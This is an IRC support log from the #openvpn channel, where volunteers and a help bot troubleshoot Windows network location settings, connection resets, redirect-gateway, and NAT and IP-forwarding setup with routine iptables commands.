hrenovo> why does openvpn default installation puts the openvpn adapter into public network instead of private. ? 14:38 < pekster> Windows default? At least the OS is starting to grow up (baby steps) and provide you slightly more security unless you work to reduce that 14:40 < pekster> It's not OpenVPN's place to set up your OS for you: that's your job 14:40 < pekster> Just like it won't automatically open your ipf or netfilter firewall, it won't do Windows OS setup for you either 14:41 <@EugeneKay> Because Public is the only sane default 14:41 <@EugeneKay> Windows network location selection is notoriously insane; don't read toofar into it 14:42 <@EugeneKay> You can fiddle about in the registry if you really want 14:42 < pekster> penk: Tunnelblick? It's been a while since I ran that (no Macs here at present, so my info is a few releases out of date) but it should either give you a UI menu to view the log, or perhaps put it somewhere under ~/Library, IIRC 14:42 < penk> nah, this was opehnvpn connect 14:42 < penk> i got it, i needed to force uninstall and reinstall 14:43 < pekster> You want #openvpn-as for the commercial closed-source stuff. We deal with the GPL OpenVPN code/project specifically 14:45 <@EugeneKay> I can't find the writeup on it now 14:45 <@EugeneKay> But it isn't pretty 14:47 < pekster> I did some interesting hacks to avoid the so-called "dnscache" trick. I wrote about it on the user ML years back, but no one seemed to be interested in a more minimal solution, choosing to prefer stopping/starting services instead; I guess you can kill flies with a sledgehammer too :) 14:48 < pekster> (IIRC that wasn't actually a caching issue at all, but a domain search suffix list that didn't auto-update on interface changes properly. Fun times.) 14:49 < pekster> Apple's dnsctl looked like a work of art by comparison 14:50 < hrenovo> public is the only sane place to put it to? Maybe its private that is the only sane place 14:50 < hrenovo> vpn should work like lan 14:50 < hrenovo> and lan is on private network, not private by default 14:50 < rob0> A sledgehammer can indeed kill a fly, but as likely as not some other fly than the one you intended to kill. :) 14:50 < hrenovo> so excuse me , no , public is not "the only" sane place 14:50 < pekster> hrenovo: For your usecase, perhaps. What if I'm connecting to a paid service and don't want to open my network up to random other people to print to? 14:50 -!- MaynardWaters [~asdfjkl@c-71-238-30-69.hsd1.mi.comcast.net] has joined #openvpn 14:51 < MaynardWaters> hey I came in here for help a few days ago, I am having trouble connecting to my vpn 14:51 < pekster> hrenovo: If an OS decides to open my PC up to (ab)use/attack by other connections, I'd call that insane and broken 14:51 < MaynardWaters> http://pastebin.com/ids2Y4HE 14:51 < MaynardWaters> can anyone offer some advice as to what might be the problem 14:52 <@EugeneKay> hrenovo - as a network security expert, no, Private is not a good default. Period. If you have a problem with this assessment, feel free to become a government contractor. 14:53 < pekster> MaynardWaters: Your TCP connection was reset, line 284 on that paste 14:54 < rob0> Connection reset, restarting (twice) 14:54 < MaynardWaters> pekster: I dont have that problem on my windows machine running openvpn right next to this ubuntu box 14:54 < pekster> OpenVPN cannot work when the peer closes the network socket. The peer logs might have more details, but that's occurring 11 seconds after connection was established 14:54 < rob0> Why are you using TCP? We don't know what reset the connection. It could have been something outside of openvpn. UDP might be better in your case. 14:55 < MaynardWaters> I did not set up the vpn, I believe TCP is the default set there, but I am unsure. 14:55 < rob0> it's a bad default, it's not openvpn's default 14:56 < MaynardWaters> well since I dont believe I have control over it, lets focus on the things I can change 14:57 < rob0> We still don't know what reset the connection. It could have been something outside of openvpn. 14:57 <@EugeneKay> !both 14:57 <@vpnHelper> "both" is If you do not control both ends of the link (server and client) then there is not much we can do to help you. Please talk to your network admin instead. 14:57 < hrenovo> EugeneKay: okay so public network is more secure than private? 14:57 <@EugeneKay> hrenovo - as far as the windows firewall defaults are concerned, yes. 14:57 <@EugeneKay> Always assume the other guy is out to get you 14:58 < hrenovo> so i've been doing some reading on how to change openvpn adapter from public to private, and it turns that that you can't 14:58 < hrenovo> because there is no gateway 14:58 < MaynardWaters> EugeneKay: my issue seems resolvable since I am using the same config files on windows with openvpn, and I do not have any problems there. so to me that means that i just need to figure out what the difference in settings are between my windows and my linux, and make the linux more like the windows, does this make sense to anyone? 14:58 <@EugeneKay> MaynardWaters - it makes logical sense, but without more info we can't give you much 14:59 < MaynardWaters> so the more info that we all agree is needed is what is resetting the connection 14:59 <@EugeneKay> hrenovo - yup, that's how Windows networking is set up. You can push a dummy route with a high metric to fake a gateway(that will never get used) tho 14:59 < rob0> check firewalls 14:59 <@EugeneKay> Or the registry trick which I can't seem to google up today 14:59 < MaynardWaters> since the connection doesnt get reset on my other machine, it seems safe to assuming it is on my local machine 14:59 < MaynardWaters> rob0: was that directed at me? 15:00 < pekster> hrenovo: You can change it just fine, at least on Vista (IIRC 7 is the same way, but I don't have 7 here to test) 15:00 < hrenovo> EugeneKay: would you happen to know which frewall rule win7 needs exactly for file sharing ? 15:00 < pekster> hrenovo: The "Network and Sharing Center", just like I said 15:00 <@EugeneKay> hrenovo - no clue what sort of file sharing you want. SMB? 15:01 <@EugeneKay> And not off hand, no. I don't memorize those port #s :-p 15:01 < hrenovo> EugeneKay: no, just regular cifs windows 7 to windows 7 on openvpn tap interface. Both win7 are vpn clients. 15:01 <@EugeneKay> SMB = CIFS 15:02 < hrenovo> I thought smb is samba, which is service you install on linux and share files on CIFS protocol to make them accessable by windows machines 15:03 < pekster> EugeneKay: FYI, I can change the public/private thing without a gateway on my tun adapter 15:03 <@EugeneKay> SMB and CIFS are two acronyms for the same thing. Samba is an implementation thereof for *nix systems. 15:03 < rob0> SMB is the predecessor of CIFS. Samba implements both. 15:03 < pekster> I just need to connect it first 15:05 <@EugeneKay> pekster - nifty. It's still crap way to detect it. 15:05 < pekster> Yup 15:05 < hrenovo> its just said that this is so difficult to share a folder on a windows vpn client 15:05 < hrenovo> sad* 15:05 <@EugeneKay> Fun fact: you can override the network location detection if your box is connected to AD, by setting up the subnet as a domain subnet. 15:06 < pekster> Oh, cute. :( 15:06 <@EugeneKay> Yup. Hence why I can't find the registry hack on my box - I don't need it. 15:07 < hrenovo> and there is no documentation on how to do it 15:08 < pekster> Really? Took me 30 seconds to search the web for this: http://www.home-network-help.com/simple-file-sharing.html 15:08 <@vpnHelper> Title: Enabling Simple File Sharing in Windows Vista (at www.home-network-help.com) 15:08 < pekster> Try harder. 15:19 < hrenovo> no 15:19 < hrenovo> this guide is not any help 15:19 < hrenovo> all the file and printer sharing is already enabled for openvpn adapter 15:20 < hrenovo> I can access shares on vpn adapter when firewawll is turned off 15:20 < hrenovo> its a firewall setting 15:20 < hrenovo> I just don't know which 15:20 < hrenovo> I wrote some details here https://forums.openvpn.net/topic12494.html 15:20 <@vpnHelper> Title: OpenVPN Support Forum Windows 7 Firewall settings for File Sharing on VPN Adapter : Server Administration (at forums.openvpn.net) 15:23 -!- tcamuso_ [tcamuso@nat/redhat/x-baiqpapqcpburuam] has quit [Ping timeout: 264 seconds] 15:54 <@krzee> hrenovo, that shows its not a openvpn issue 15:55 < hrenovo> krzee: ok its not, its windows fireall. You are 100% right. If I ask on windows forums or #windows they have no idea how to help me 15:56 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has quit [Quit: I quit] 15:56 <@krzee> aww i didn't mean he had to gtfo, lol 15:56 <@krzee> just thought ild point out that its !notovpn lol 15:58 < rob0> If you don't know how to run Windows, find a better OS. 15:58 <@krzee> s/If you don't know how to run// 15:58 <@krzee> :D 15:58 < rob0> It's not hard. Just about any OS qualifies. 15:59 < rob0> maybe not DOS, but FreeDOS is sort of interesting :) 16:00 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn 16:02 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: This computer has gone to sleep] 16:07 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 16:13 -!- master_o1_master [~master_of@p4FF24AE2.dip.t-dialin.net] has quit [Ping timeout: 240 seconds] 16:19 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 16:20 -!- master_of_master [~master_of@p4FF24672.dip.t-dialin.net] has joined #openvpn 16:20 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 264 seconds] 16:21 -!- dave [~dave@static-66-137-171-68.axsne.net] has joined #openvpn 16:22 -!- dave is now known as Guest27261 16:23 -!- penk [~dave@static-66-137-171-68.axsne.net] has quit [Read error: Connection reset by peer] 16:23 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 16:25 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 16:26 -!- Guest27261 [~dave@static-66-137-171-68.axsne.net] has quit [Ping timeout: 248 seconds] 16:26 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 16:51 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:53 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has quit [Ping timeout: 264 seconds] 17:00 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit [] 17:04 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 17:12 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 17:15 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 17:18 -!- matt_ [~matt@mlpc.wiltshire.ac.uk] has joined #openvpn 17:19 < matt_> hello, i'm having problems attempting to get passtos to have any effect, I can see a tos value of 0x10 on the openvpn tap device but i dont see it on the outside 17:20 < matt_> has anybody had any issues with this before? I am not using user or group statements and I have seen passtos = ENABLED in the logs 17:20 < matt_> this is on the client side and i'm using openvpn version 2.2.2 17:21 -!- brute11k [~brute@89.249.231.53] has quit [Quit: Leaving.] 17:24 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn 17:26 -!- tcamuso_ [~tcamuso@pool-71-161-82-88.cncdnh.east.myfairpoint.net] has joined #openvpn 17:30 -!- Poster [~poster@cpe-184-57-119-105.columbus.res.rr.com] has quit [Quit: ocean pulls me close her whispers in my ear the destiny have chose all becoming clear the currents have their say the time is drawing near washes me away makes me dissapear i decend from grace in arms of undertow i will take my place in the great below] 17:31 -!- benkay [~benkay@c-71-237-161-120.hsd1.or.comcast.net] has joined #openvpn 17:32 < benkay> !goal ping through vpn to external web and to other nodes on vpn 17:33 < benkay> so! I have my vpn up and running, certs and keys distributed appropriately, but when I actually do the thing and connect to the vpn server (with all local traffic routed through the vpn with redirect-gateway def1), everything times out. and I mean everything. 17:34 < benkay> which is relatively good, because it shows that things are wired up appropriately, but there's something borked on the server because it seems that packets go to the server to die. 17:34 < benkay> which, undesirable. 17:34 < benkay> does anyone have any suggestions on how to diagnose where the pipe is breaking down? 17:36 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 17:36 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 17:36 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 17:36 -!- mode/#openvpn [+o krzee] by ChanServ 17:36 < kisom> benkay: Firewall issue, or your server is not routing properly. 17:36 < kisom> Can you ping the servers VPN IP address? 17:36 <@krzee> kisom, pan behind server? 17:37 <@krzee> lan* 17:37 < kisom> krzee: Huh? 17:37 < benkay> can't ping, but can ssh into server and open vpn connection to server 17:37 <@krzee> whats his problem? with that first step I'm betting theres a flowchart for it 17:37 < benkay> kisom 17:38 <@krzee> oh, ya thats firewell 17:38 <@krzee> firewall* 17:39 < benkay> talking to me krzee? 17:39 <@krzee> ya 17:39 < benkay> but not in between my box and vpn server box, but between vpn server box and rest of webz? 17:42 < benkay> brb redirecting network traffic over broken vpn 17:44 -!- benkay [~benkay@c-71-237-161-120.hsd1.or.comcast.net] has quit [Quit: benkay] 17:45 -!- benkay [~benkay@c-71-237-161-120.hsd1.or.comcast.net] has joined #openvpn 17:49 <@krzee> benkay, you can't ping the vpn ip of the server, but can ssh to the vpn ip of the server… right? 17:50 < benkay> I have to ssh from my company's util box to the client box, but yes. 17:50 < benkay> (because whitelisting) 17:50 < benkay> but the vpn connection works fine. that's not whitelisted. 17:50 < benkay> er, whitelist-filtered. 17:51 < benkay> however we say that. 17:51 <@krzee> i have no idea what you're saying 17:51 <@krzee> what ip can you not ping? 17:51 < benkay> I can't ssh to the client box directly, as my ip is not on the ssh whitelist. 17:51 < benkay> I cannot ping the vpn server IP. 17:52 <@krzee> the vpn servers PUBLIC or VPN ip? 17:52 < benkay> public. 17:52 < benkay> what's the difference? 17:52 <@krzee> the difference is HUGE 17:52 <@krzee> and in this case, it can be any firewall in between your machines, and has nothing to do with openvpn 17:53 < benkay> is the "vpn ip" the address the internal network sees the vpn server on? 17:54 <@krzee> post your server config and ill tell you the vpn ip 17:54 < benkay> cool and thanks! half a sec. 18:00 -!- benkay [~benkay@c-71-237-161-120.hsd1.or.comcast.net] has quit [Ping timeout: 260 seconds] 18:01 -!- benkay_ [~benkay@130.sub-97-50-230.myvzw.com] has joined #openvpn 18:01 < benkay_> still working on it. 18:04 < benkay_> would that be the local directive? 18:05 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has quit [Read error: Operation timed out] 18:06 <@krzee> !configs 18:06 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 18:07 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has joined #openvpn 18:08 -!- MacGyver [~MacGyver@unaffiliated/macgyvernl] has quit [Ping timeout: 264 seconds] 18:09 < benkay_> http://dpaste.com/hold/1030655/ 18:09 -!- MacGyver [~MacGyver@kershaw.polvanaubel.com] has joined #openvpn 18:09 -!- MacGyver [~MacGyver@kershaw.polvanaubel.com] has quit [Changing host] 18:09 -!- MacGyver [~MacGyver@unaffiliated/macgyvernl] has joined #openvpn 18:10 <@krzee> 10.8.0.1 is your vpn server ip 18:10 <@krzee> your first client will be .6 then .10 then .14 and so on 18:10 < rob0> eww, /30 18:10 <@krzee> line 15 will give you a problem 18:11 -!- tyteen4a- [tyteen4a03@69.50.229.69] has quit [Read error: Operation timed out] 18:11 -!- benkay_ is now known as benkay 18:12 < benkay> what will happen? 18:13 <@krzee> not sure, never sent 2 args to --group 18:13 <@krzee> maybe an error on parsing, maybe it can't find the group "no" 18:14 < benkay> ah i see. 18:14 <@krzee> make sure --group matches a group 18:14 <@krzee> and --user matches a user 18:14 <@krzee> heh 18:14 < benkay> that was actually a typo in my dpaste-ing 18:15 < benkay> would you confirm something for me: I should still be connecting to the "public" ip, correct? 18:15 <@krzee> that config will change nothing about that 18:16 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]] 18:16 < benkay> yup! just confirming my hunces. 18:16 < benkay> hunches* 18:21 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 18:22 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 260 seconds] 18:22 <@krzee> benkay, when you want the connection to the server to be secured by the vpn, you connect to 10.8.0.1 18:24 -!- SuperGauntlet [~supergaun@d14-69-67-219.try.wideopenwest.com] has joined #openvpn 18:25 < SuperGauntlet> This is a noob question but can anyone point me towards a way to setup openvpn so that I can access the outside internet? Currently I can access the LAN but not the WAN 18:25 < SuperGauntlet> I'm sure it's a forwarding problem or something but I'm just not sure how to fix it 18:25 < SuperGauntlet> !welcome 18:25 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample 18:25 <@vpnHelper> !forum !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 18:25 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 245 seconds] 18:25 <@krzee> SuperGauntlet, you want to redirect your internet over the vpn? 18:25 < rob0> !redirect 18:25 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 18:25 <@vpnHelper> http://ircpimps.org/redirect.png 18:26 < rob0> see the flowchart 18:26 < SuperGauntlet> haha you guys have all of this aliased? 18:26 < SuperGauntlet> You probably get these questions a lot. Thanks. 18:26 <@krzee> same questions everyday for years ;] 18:26 < rob0> we ... yes. 18:26 < SuperGauntlet> I bet that could be infuriating. Sorry for contributing to the tidal wave e.e 18:27 < SuperGauntlet> So I put --redirect-gateway local in /etc/openvpn/server.conf, correct? 18:27 < SuperGauntlet> Or does it go in client.conf? 18:28 < rob0> it's typically a push command from the server 18:28 < SuperGauntlet> !def1 18:28 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 18:28 <@krzee> i think its better in the client 18:28 <@krzee> dunno why people typically put it in server as push 18:29 <@krzee> then their clients come in here saying "how do i bypass redirect-gateway getting pushed at me?" 18:29 < SuperGauntlet> So I add 'redirect-gateway' in client.conf/ovpn? 18:29 < SuperGauntlet> lol 18:29 < rob0> hehe 18:29 <@krzee> yep, with optional flags to redirect-gateway as seen in the manual 18:29 <@krzee> !man 18:29 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 18:29 < SuperGauntlet> rtfm indeed 18:31 < benkay> krzee: 10.8.0.1 is inside the vpn, right? i'm a little confused at the idea that I'd connect to an ip inside the vpn to connect to the vpn 18:31 < rob0> benkay, ? You misunderstand something, not sure what. 18:32 < SuperGauntlet> oh wow that worked 18:32 < benkay> "when you want the connection to the server to be secured by the vpn, you connect to 10.8.0.1" 18:32 < SuperGauntlet> when has it *ever* been that simple 18:32 <@krzee> benkay, once you are on the vpn, it only gives you a connection to the server over the vpn (unless you told it otherwise) 18:32 <@krzee> benkay, the vpn connection doesn't magically encrypt everything, only traffic destined by your routing table to flow over the vpn 18:33 < rob0> If you want to USE the vpn, you connect to the VPN IP. You connect openvpn itself to the outside IP. 18:33 < SuperGauntlet> wait, nope, doesn't work now. oh boy 18:33 <@krzee> SuperGauntlet, did you read ALL the instructions? 18:33 <@krzee> !redirect 18:33 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 18:33 <@vpnHelper> http://ircpimps.org/redirect.png 18:33 < SuperGauntlet> I'm just working through it. 18:33 <@krzee> 3 things to do, only 1 is in the openvpn config 18:34 < SuperGauntlet> I tried the first thing and it appeared to work but didn't. Pinging 8.8.8.8 produces 100% packet loss 18:34 <@krzee> what os is the server? 18:35 < SuperGauntlet> ubuntu minimal 18:35 <@krzee> !linnat 18:35 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat 18:35 <@krzee> !linipforward 18:35 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 18:35 < SuperGauntlet> so use iptables 18:35 < SuperGauntlet> where's sysctl.conf? 18:36 <@krzee> its your os... 18:36 < SuperGauntlet> Sorry, thought you knew 18:36 <@krzee> do, but not spoonfeeding 18:37 < SuperGauntlet> I already have that forwarding on apparently 18:39 < SuperGauntlet> It works, thanks! 18:40 <@krzee> yw =] 18:41 < SuperGauntlet> I like how there's no username/pw involved, all you need is the client config and certs/keys 18:41 < benkay> i'm beginning to get it krzee, rob0 (thanks for your patience and explanations, by the way). so for an encrypted connection I connect to the server's public ip and then ssh to the VPN server id? 18:42 <@krzee> you connect to the vpn, then use whatever you want on the servers vpn ip 18:43 <@krzee> for example, if the server runs smtp, to connect to smtp over the vpn you must have the smtp server listening on the vpn ip and connect to that 18:43 < benkay> awesome. 18:47 -!- Poster [~poster@cpe-184-57-119-105.columbus.res.rr.com] has joined #openvpn 18:47 < benkay> so then in a situation where I route all of my local traffic through the vpn interface which connects to the vpn server's public ip, how do I then pass it out to the greater internet at large? 18:47 -!- Matir [~matir@ubuntu/member/matir] has quit [Read error: Operation timed out] 18:47 < benkay> oh, unbreak firewall. 18:48 <@krzee> benkay, we just helped SuperGauntlet do that above ^ 18:49 < SuperGauntlet> they aren't joking when they say it's a firewall issue 18:49 < benkay> thanks :) 18:49 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 18:59 -!- raidz is now known as raidz_away 19:08 < benkay> !nat 19:08 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 19:08 < benkay> !linnat 19:08 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat 19:11 < benkay> wtf masquerade? 19:15 -!- benkay [~benkay@130.sub-97-50-230.myvzw.com] has quit [Ping timeout: 245 seconds] 19:16 < SuperGauntlet> Yeah I've never heard of that command before either 19:16 -!- benkay [~benkay@130.sub-97-50-230.myvzw.com] has joined #openvpn 19:17 < SuperGauntlet> Did it work? 19:20 < benkay> we'll see. 19:23 < benkay> hello world? 19:23 < benkay> !help 19:23 < benkay> !welcome 19:23 <@vpnHelper> (help [] []) -- This command gives a useful description of what does. is only necessary if the command is in more than one plugin. 19:23 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 19:23 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 19:23 < benkay> whoa. 19:23 < benkay> so apparently things were going out but no traffic was coming back in? 19:25 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 19:25 < benkay> !interface 19:25 <@vpnHelper> "interface" is (#1) paste interface configuration from both client and server, while being disconnected and when beeing connected. Be sure to also add the routing tables for both situations from client and from server or (#2) For Windows: iface: 'ipconfig /all' routing: 'route print' (add -4 or -6 for just IPv4 or v6) or (#3) For Unix: iface: 'ifconfig -a' routing: 'netstat -rn' or (#4) For Linux: 19:25 <@vpnHelper> iface: 'ip a' routing: 'ip r' (use ip -6 for IPv6 routes) 19:31 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 19:36 < benkay> no, it did not work. 19:41 -!- benkay [~benkay@130.sub-97-50-230.myvzw.com] has quit [Ping timeout: 264 seconds] 19:43 -!- Denial [~Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 260 seconds] 19:44 -!- cosmicgate [~root@sugest.me.what.to.do.with.wildfirevpn.com] has joined #openvpn 19:52 -!- penk [~dave@pool-100-0-131-24.bstnma.east.verizon.net] has joined #openvpn 19:53 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has joined #openvpn 19:53 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 19:58 -!- benedikt [~benedikt@unaffiliated/benedikt] has joined #openvpn 19:58 < benedikt> How do i create an intermediary CA under the root ca that ./build-ca creates? 19:59 < benedikt> In short I want a CA structure like Root CA -> Intermediary CA -> Server -> Clients 19:59 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 20:00 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 264 seconds] 20:00 -!- Denial- is now known as Denial 20:01 < benedikt> nevermind 20:01 < benedikt> (pkitool)( 20:11 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: This computer has gone to sleep] 20:21 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 20:21 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 20:21 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 20:21 -!- mode/#openvpn [+o krzee] by ChanServ 20:24 -!- catsup [~d@64.111.123.163] has joined #openvpn 20:31 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer] 20:31 -!- catsup [~d@64.111.123.163] has joined #openvpn 20:32 -!- EugeneKay [eugene@madeitwor.se] has quit [Ping timeout: 245 seconds] 20:36 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 256 seconds] 20:37 -!- catsup [~d@64.111.123.163] has joined #openvpn 20:43 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 256 seconds] 20:44 -!- catsup [~d@64.111.123.163] has joined #openvpn 20:49 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 246 seconds] 20:50 -!- catsup [~d@64.111.123.163] has joined #openvpn 20:51 < benedikt> If i have two vpn servers, both have their key signed by the same ca. 20:52 -!- benedikt [~benedikt@unaffiliated/benedikt] has left #openvpn [] 20:55 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 255 seconds] 20:56 -!- matsh [divine@nanogene.org] has joined #openvpn 20:57 -!- catsup [~d@64.111.123.163] has joined #openvpn 21:00 -!- p3rror [~mezgani@196.201.78.139] has joined #openvpn 21:03 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 264 seconds] 21:03 -!- catsup [~d@64.111.123.163] has joined #openvpn 21:09 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer] 21:09 -!- catsup [~d@64.111.123.163] has joined #openvpn 21:14 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 240 seconds] 21:16 -!- catsup [~d@64.111.123.163] has joined #openvpn 21:17 -!- p3rror [~mezgani@196.201.78.139] has quit [Quit: Leaving] 21:22 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer] 21:22 -!- catsup [~d@64.111.123.163] has joined #openvpn 21:27 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 21:27 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 252 seconds] 21:28 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 245 seconds] 21:29 -!- catsup [~d@64.111.123.163] has joined #openvpn 21:29 -!- epochwolf [~root@unaffiliated/epochwolf] has joined #openvpn 21:32 -!- epochwolf [~root@unaffiliated/epochwolf] has left #openvpn ["Textual IRC Client: http://www.textualapp.com/"] 21:34 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 256 seconds] 21:35 -!- catsup [~d@64.111.123.163] has joined #openvpn 21:41 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 256 seconds] 21:41 -!- catsup [~d@64.111.123.163] has joined #openvpn 21:46 -!- nastjuid [~nastjuid@c-76-102-128-160.hsd1.ca.comcast.net] has joined #openvpn 21:46 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 240 seconds] 21:47 -!- SuperGauntlet [~supergaun@d14-69-67-219.try.wideopenwest.com] has quit [Quit: Leaving] 21:48 -!- catsup [~d@64.111.123.163] has joined #openvpn 21:54 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 264 seconds] 21:54 -!- catsup [~d@64.111.123.163] has joined #openvpn 22:00 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 245 seconds] 22:01 -!- catsup [~d@64.111.123.163] has joined #openvpn 22:05 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 22:06 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 255 seconds] 22:07 -!- catsup [~d@64.111.123.163] has joined #openvpn 22:08 -!- tekzilla [~jon@24.134.142.157] has quit [Ping timeout: 264 seconds] 22:09 -!- tekzilla [~jon@24.134.142.157] has joined #openvpn 22:14 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer] 22:14 -!- catsup [~d@64.111.123.163] has joined #openvpn 22:18 -!- mitz__ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 22:18 -!- mitz_ 